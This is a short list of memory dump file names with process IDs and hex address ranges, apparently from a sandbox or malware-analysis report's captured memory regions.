memory/3196-223-0x0000021738E70000-0x0000021738E72000-memory.dmp
memory/3196-224-0x0000021751B70000-0x0000021751BE6000-memory.dmp
memory/3596-225-0x000001F362FD8000-0x000001F362FD9000-memory.dmp
memory/3196-227-0x0000021751473000-0x0000021751475000-memory.dmp
memory/3196-226-0x0000021751470000-0x0000021751472000-memory.dmp
memory/3196-228-0x0000021738E70000-0x0000021738E72000-memory.dmp
memory/3196-252-0x0000021738E70000-0x0000021738E72000-memory.dmp
memory/3196-253-0x0000021751476000-0x0000021751478000-memory.dmp
memory/3196-254-0x0000021751478000-0x0000021751479000-memory.dmp